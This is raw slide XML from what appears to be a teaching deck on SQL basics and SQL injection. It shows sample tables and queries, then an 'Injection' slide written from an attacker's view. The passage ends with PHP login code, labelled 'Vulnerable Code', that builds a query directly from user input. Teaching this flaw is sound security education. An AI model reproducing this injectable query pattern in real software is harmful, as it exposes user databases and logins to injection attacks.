              <a:t>SELECT * from Users WHERE name = 'Joe';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="573" name="Shape 57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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="574" name="Shape 574"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1258425" y="3556450"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:tableStyleId>{530C1A98-9BF4-4644-A2AA-ACC82827FF89}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1096475"/>
                <a:gridCol w="848225"/>
                <a:gridCol w="2351575"/>
                <a:gridCol w="1186125"/>
                <a:gridCol w="1144750"/>
              </a:tblGrid>
              <a:tr h="342900">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age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address</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salary</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Joe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789 Park Street</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55000</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Shape 579"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="580" name="Shape 580"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="8229600" cy="4878300"/>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lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>e have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> with this Project table</a:t>
            </a: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342900" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="3200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>How do we get just the entries for Pro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ject </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>X?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="581" name="Shape 581"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="582" name="Shape 582"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="764850" y="2028113"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:tableStyleId>{530C1A98-9BF4-4644-A2AA-ACC82827FF89}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2252575"/>
                <a:gridCol w="2998125"/>
                <a:gridCol w="2363600"/>
              </a:tblGrid>
              <a:tr h="589200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="142857"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1500"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="333333"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>pnumber</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b="1" lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="333333"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>pname</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b="1" lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="333333"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>plocation</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="76200" marB="76200" marR="76200" marL="76200" anchor="ctr">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Project X</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nchor="ctr">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200">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2</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Project Y</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nchor="ctr">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3</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Project Z</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Houston</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="76200" marB="76200" marR="76200" marL="76200" anchor="ctr">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tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="589200">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4</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Middleware</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Austin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="76200" marB="76200" marR="76200" marL="76200" anchor="ctr">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589200">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5</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Lazer Printers</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="76200" marB="76200" marR="76200" marL="76200" anchor="ctr">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gn="ctr">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nchor="ctr">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Shape 587"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="588" name="Shape 588"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="3200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFF00"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-US" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en-US" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>roject WHERE pname = 'Pro</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ject </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en-US" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>X';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="3200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589" name="Shape 589"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="590" name="Shape 590"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1353250" y="3968325"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:tableStyleId>{530C1A98-9BF4-4644-A2AA-ACC82827FF89}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2198250"/>
                <a:gridCol w="2075000"/>
                <a:gridCol w="2300975"/>
              </a:tblGrid>
              <a:tr h="342900">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pnumber</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pname</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c>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="142857"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1500"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="333333"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>plocation</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="76200" marB="76200" marR="76200" marL="76200">
                    <a:lnL cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="DDDDDD"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnT cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="DDDDDD"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="F9F9F9"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="352425">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1</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Project X</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="76200" marB="76200" marR="76200" marL="76200">
                    <a:lnL cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="DDDDDD"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="DDDDDD"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="DDDDDD"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="142857"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1500"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="333333"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>Dallas</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="76200" marB="76200" marR="76200" marL="76200">
                    <a:lnL cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="DDDDDD"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnL>
                    <a:lnT cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="DDDDDD"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="med" w="med" type="none"/>
                      <a:tailEnd len="med" w="med" type="none"/>
                    </a:lnT>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Shape 595"/>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 Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="596" name="Shape 596"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="82296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2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>So what good is this to us as attackers?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Remember that </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>$name </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>variable?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="1" sz="2000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFF00"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-US" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT * from users WHERE name = '$name';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>We control it! How about in this one?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFF00"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-US" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE username=$user AND password=$pass</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="597" name="Shape 597"/>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Shape 603"/>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Vulnerable Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="604" name="Shape 604"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8473500" cy="4526100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$user = $argv[0]; //user input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$pass = $argv[1]; //user input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$query  = "SELECT * FROM Users </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>WHERE Username = ‘$user’ and password = ‘$pass’;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="387350" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="34375"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$result = pg_query($conn,$query);</a:t>
            </a:r>
          </a:p>
